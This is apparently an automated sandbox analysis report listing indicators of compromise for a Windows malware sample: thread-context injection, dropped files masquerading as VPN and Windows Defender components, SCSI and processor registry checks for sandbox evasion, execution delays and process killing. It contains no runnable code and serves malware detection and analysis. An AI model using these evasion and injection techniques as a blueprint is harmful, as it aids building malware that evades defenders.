pid Process 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 4628 mask_svc.exe 7092 mask_svc.exe 5856 mask_svc.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 7424 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 8964 1.exe 7004 1.exe 7004 1.exe 7004 1.exe 7004 1.exe 7004 1.exe 7004 1.exe 7004 1.exe 7004 1.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 4812 set thread context of 3612 4812 svchost.exe 109 PID 1268 set thread context of 4680 1268 908D.tmp.exe 117 PID 1268 set thread context of 5188 1268 908D.tmp.exe 119 PID 3516 set thread context of 4716 3516 f49msXwaGcZo.exe 171 PID 5728 set thread context of 804 5728 2.exe 185 PID 2184 set thread context of 212 2184 1.exe 213 PID 6940 set thread context of 7320 6940 toolspab1.exe 266 PID 7532 set thread context of 6388 7532 2.exe 300 PID 7424 set thread context of 7720 7424 1.exe 325 PID 3988 set thread context of 8736 3988 BDB5.tmp.exe 377 PID 8132 set thread context of 8788 8132 CEFA.tmp.exe 468 PID 3988 set thread context of 8232 3988 BDB5.tmp.exe 382 PID 8132 set thread context of 8304 8132 CEFA.tmp.exe 383 PID 7588 set thread context of 7824 7588 2.exe 473 PID 5980 set thread context of 8748 5980 2.exe 474 PID 8964 set thread context of 6396 8964 1.exe 496 PID 7004 set thread context of 1568 7004 1.exe 497 PID 64 set thread context of 6448 64 2.exe 500 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\MaskVPN\is-585IV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-4O7QL.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-KNET2.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\viewerise\is-TQSVS.tmp muwrgmlshuf.tmp File created C:\Program Files (x86)\I-record\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png setup_10.2_mix.exe File created C:\Program Files (x86)\MaskVPN\is-GUCNT.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Install engine 16\Swap.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-N5SDU.tmp vpn.tmp File opened for modification C:\Program Files\unins0000.dll guihuali-game.exe File opened for modification C:\Program Files (x86)\I-record\avfilter-2.dll irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png setup_10.2_mix.exe File created C:\Program Files (x86)\Install engine 16\is-DN0TJ.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Windows Defender\Poshaegegary.exe Microsoft.exe File opened for modification C:\Program Files (x86)\I-record\avutil-51.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-RQDB8.tmp irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-D8CNT.tmp prolab.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d jg7_7wjg.exe File created C:\Program Files\unins0000.dat Full Program Features.exe File created C:\Program Files (x86)\MaskVPN\is-O5DEV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QGPME.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-GA6TA.tmp vpn.tmp File created C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe.config ppppppfy.exe File opened for modification C:\Program Files (x86)\I-record\i-record.exe irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-7781B.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\Gadget.Xml setup_10.2_mix.exe File opened for modification C:\Program Files\unins0000.dat Full Program Features.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-P7OM1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\SourceLibrary.dll prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_pressed.png setup_10.2_mix.exe File created C:\Program Files (x86)\MaskVPN\is-0096S.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe Setup.exe File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d jg7_7wjg.exe File opened for modification C:\Program Files\unins.vbs Full Program Features.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-RB2RL.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\is-N8LVJ.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe Setup.exe File created C:\Program Files\jp2native.dll guihuali-game.exe File created C:\Program Files (x86)\I-record\is-5BCTV.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-P8C4V.tmp vpn.tmp File created C:\Program Files (x86)\I-record\is-L6QIO.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_bg.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\viewerise\unins000.dat muwrgmlshuf.tmp File opened for modification C:\Program Files (x86)\I-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-49CHG.tmp irecord.tmp File created C:\Program Files (x86)\viewerise\unins000.dat muwrgmlshuf.tmp File created C:\Program Files (x86)\I-record\is-7CV6Q.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-A2U96.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\AForge.Video.FFMPEG.dll irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BS3TA.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-V04J4.tmp muwrgmlshuf.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.Math.dll prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_pressed.png setup_10.2_mix.exe File created C:\Program Files (x86)\I-record\is-7TRUH.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp -
Drops file in Windows directory 45 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI8F6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI673A.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\inf\oem2.inf 2.exe File created C:\Windows\inf\oem2.inf 2.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new 4pk4ooaomy2.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF57C.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log dw20.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new 4pk4ooaomy2.exe File opened for modification C:\Windows\Installer\MSID4B4.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT explorer.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI7C7A.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File opened for modification C:\Windows\Installer\MSI639F.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIF22.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIC14.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI1FAD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI224E.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log 2.exe File created C:\Windows\Installer\f75e7c1.msi msiexec.exe File opened for modification C:\Windows\Installer\f75e7c1.msi msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT explorer.exe File created C:\Windows\Tasks\.job aipackagechainer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI6285.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DB3.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
pid pid_target Process procid_target 5172 2184 WerFault.exe 152 7184 2188 WerFault.exe 147 7896 2188 WerFault.exe 147 6528 2188 WerFault.exe 147 5348 2188 WerFault.exe 147 7872 2188 WerFault.exe 147 6236 2188 WerFault.exe 147 6832 2188 WerFault.exe 147 7036 2188 WerFault.exe 147 7868 2188 WerFault.exe 147 1416 2188 WerFault.exe 147 7852 2188 WerFault.exe 147 6232 2188 WerFault.exe 147 7272 6004 WerFault.exe 143 5388 7424 WerFault.exe 277 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags dw20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 dw20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs dw20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2D5A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2D5A.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 7732 timeout.exe 2368 timeout.exe 7072 timeout.exe 976 timeout.exe 5792 timeout.exe 4388 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 9 IoCs
pid Process 2576 taskkill.exe 5092 taskkill.exe 4364 taskkill.exe 6516 taskkill.exe 5852 taskkill.exe 6092 taskkill.exe 7472 taskkill.exe 8912 taskkill.exe 8360 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main Jaelashagify.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key 